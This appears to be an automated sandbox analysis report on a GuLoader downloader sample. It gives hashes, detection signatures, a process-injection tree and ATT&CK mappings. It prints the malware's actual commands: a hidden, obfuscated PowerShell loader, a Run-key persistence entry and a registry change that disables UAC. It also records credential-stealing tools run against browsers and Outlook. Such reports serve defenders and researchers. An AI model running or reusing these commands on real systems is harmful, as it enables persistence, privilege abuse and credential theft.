Analysis
- max time kernel: 149s
- max time network: 150s
- platform: windows10-2004_x64
- resource: win10v2004-20240704-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240704-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 09-07-2024 11:11
Static task: static1
Behavioral task: behavioral1
- Sample: MalwareBazaar.exe
- Resource: win7-20240704-en
Behavioral task: behavioral2
- Sample: MalwareBazaar.exe
- Resource: win10v2004-20240704-en
General
- Target: MalwareBazaar.exe
- Size: 387KB
- MD5: 06e45d2db3c52517fc7139b3b32a4742
- SHA1: 602ab4e85c1506af02d51e144298bac3aea331ca
- SHA256: 9500e0c5048bf63eeb3dee4c704ebd0f7ddc24902be50a9ef1dd0c0148546e0f
- SHA512: 32e1131c14136721d872ea13736fe7041d8d7e09a1efac363a4bc1d29a9bcd4fcfc8e523cf689386a7e8fe67100194211a1ea9934f7fde5f241df77adcdb61bd
- SSDEEP: 12288:3GqS6hqE06uAyNOcSN6dJjfJ1mPaxm5Bj3O9X:3GqS6hb0Kd4FBcixmBje9
Malware Config
Signatures
-
Guloader, Cloudeye
A shellcode-based downloader first seen in 2020.
-
Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource | yara_rule
behavioral2/memory/776-75-0x0000000000400000-0x0000000000462000-memory.dmp | MailPassView
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource | yara_rule
behavioral2/memory/4116-69-0x0000000000400000-0x0000000000478000-memory.dmp | WebBrowserPassView
Nirsoft 3 IoCs
Processes:
resource | yara_rule
behavioral2/memory/776-75-0x0000000000400000-0x0000000000462000-memory.dmp | Nirsoft
behavioral2/memory/2956-71-0x0000000000400000-0x0000000000424000-memory.dmp | Nirsoft
behavioral2/memory/4116-69-0x0000000000400000-0x0000000000478000-memory.dmp | Nirsoft
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | wab.exe
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Grshoppens% -windowstyle minimized $nedstemmes=(Get-ItemProperty -Path 'HKCU:\\Ufrugtbarhedens\\').quadricapsular;%Grshoppens% ($nedstemmes)" | reg.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
pid | process
1784 | wab.exe
1784 | wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
pid | process
4388 | powershell.exe
1784 | wab.exe
Suspicious use of SetThreadContext 4 IoCs
Processes:
description | pid | process | target process
PID 4388 set thread context of 1784 | 4388 | powershell.exe | wab.exe
PID 1784 set thread context of 4116 | 1784 | wab.exe | wab.exe
PID 1784 set thread context of 776 | 1784 | wab.exe | wab.exe
PID 1784 set thread context of 2956 | 1784 | wab.exe | wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
pid | process
4388 | powershell.exe
4388 | powershell.exe
4388 | powershell.exe
4388 | powershell.exe
4388 | powershell.exe
4388 | powershell.exe
4388 | powershell.exe
4388 | powershell.exe
4388 | powershell.exe
4116 | wab.exe
4116 | wab.exe
2956 | wab.exe
2956 | wab.exe
4116 | wab.exe
4116 | wab.exe
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
pid | process
4388 | powershell.exe
1784 | wab.exe
1784 | wab.exe
1784 | wab.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 4388 | powershell.exe
Token: SeDebugPrivilege | 2956 | wab.exe
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
pid | process
1784 | wab.exe
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
description | pid | process | target process
PID 4400 wrote to memory of 4388 | 4400 | MalwareBazaar.exe | powershell.exe
PID 4400 wrote to memory of 4388 | 4400 | MalwareBazaar.exe | powershell.exe
PID 4400 wrote to memory of 4388 | 4400 | MalwareBazaar.exe | powershell.exe
PID 4388 wrote to memory of 1784 | 4388 | powershell.exe | wab.exe
PID 4388 wrote to memory of 1784 | 4388 | powershell.exe | wab.exe
PID 4388 wrote to memory of 1784 | 4388 | powershell.exe | wab.exe
PID 4388 wrote to memory of 1784 | 4388 | powershell.exe | wab.exe
PID 4388 wrote to memory of 1784 | 4388 | powershell.exe | wab.exe
PID 1784 wrote to memory of 2656 | 1784 | wab.exe | cmd.exe
PID 1784 wrote to memory of 2656 | 1784 | wab.exe | cmd.exe
PID 1784 wrote to memory of 2656 | 1784 | wab.exe | cmd.exe
PID 2656 wrote to memory of 3496 | 2656 | cmd.exe | reg.exe
PID 2656 wrote to memory of 3496 | 2656 | cmd.exe | reg.exe
PID 2656 wrote to memory of 3496 | 2656 | cmd.exe | reg.exe
PID 1784 wrote to memory of 896 | 1784 | wab.exe | cmd.exe
PID 1784 wrote to memory of 896 | 1784 | wab.exe | cmd.exe
PID 1784 wrote to memory of 896 | 1784 | wab.exe | cmd.exe
PID 896 wrote to memory of 4616 | 896 | cmd.exe | reg.exe
PID 896 wrote to memory of 4616 | 896 | cmd.exe | reg.exe
PID 896 wrote to memory of 4616 | 896 | cmd.exe | reg.exe
PID 1784 wrote to memory of 4116 | 1784 | wab.exe | wab.exe
PID 1784 wrote to memory of 4116 | 1784 | wab.exe | wab.exe
PID 1784 wrote to memory of 4116 | 1784 | wab.exe | wab.exe
PID 1784 wrote to memory of 4116 | 1784 | wab.exe | wab.exe
PID 1784 wrote to memory of 776 | 1784 | wab.exe | wab.exe
PID 1784 wrote to memory of 776 | 1784 | wab.exe | wab.exe
PID 1784 wrote to memory of 776 | 1784 | wab.exe | wab.exe
PID 1784 wrote to memory of 776 | 1784 | wab.exe | wab.exe
PID 1784 wrote to memory of 2956 | 1784 | wab.exe | wab.exe
PID 1784 wrote to memory of 2956 | 1784 | wab.exe | wab.exe
PID 1784 wrote to memory of 2956 | 1784 | wab.exe | wab.exe
PID 1784 wrote to memory of 2956 | 1784 | wab.exe | wab.exe
Processes
(depth 1) C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"
  - Suspicious use of WriteProcessMemory
  PID: 4400
  (depth 2) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    command line: "powershell.exe" -windowstyle hidden "$Metabolizable=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Emptyhanded.Sla139';$Kumpan=$Metabolizable.SubString(7195,3);.$Kumpan($Metabolizable)"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 4388
    (depth 3) C:\Program Files (x86)\windows mail\wab.exe
      command line: "C:\Program Files (x86)\windows mail\wab.exe"
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetThreadContext
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      PID: 1784
      (depth 4) C:\Windows\SysWOW64\cmd.exe
        command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Grshoppens% -windowstyle minimized $nedstemmes=(Get-ItemProperty -Path 'HKCU:\Ufrugtbarhedens\').quadricapsular;%Grshoppens% ($nedstemmes)"
        - Suspicious use of WriteProcessMemory
        PID: 2656
        (depth 5) C:\Windows\SysWOW64\reg.exe
          command line: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Grshoppens% -windowstyle minimized $nedstemmes=(Get-ItemProperty -Path 'HKCU:\Ufrugtbarhedens\').quadricapsular;%Grshoppens% ($nedstemmes)"
          - Adds Run key to start application
          - Modifies registry key
          PID: 3496
      (depth 4) C:\Windows\SysWOW64\cmd.exe
        command line: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        - Suspicious use of WriteProcessMemory
        PID: 896
        (depth 5) C:\Windows\SysWOW64\reg.exe
          command line: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          - UAC bypass
          - Modifies registry key
          PID: 4616
      (depth 4) C:\Program Files (x86)\windows mail\wab.exe
        command line: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\wlbajicggjhdvpqkjgfsqomgqjtmp"
        - Suspicious behavior: EnumeratesProcesses
        PID: 4116
      (depth 4) C:\Program Files (x86)\windows mail\wab.exe
        command line: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\hfptjamzurzhxweosrrutbhxrqdnqnxy"
        - Accesses Microsoft Outlook accounts
        PID: 776
      (depth 4) C:\Program Files (x86)\windows mail\wab.exe
        command line: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\rhul"
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 2956
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
- Abuse Elevation Control Mechanism: 1
  - Bypass User Account Control: 1
- Boot or Logon Autostart Execution: 1
  - Registry Run Keys / Startup Folder: 1
Downloads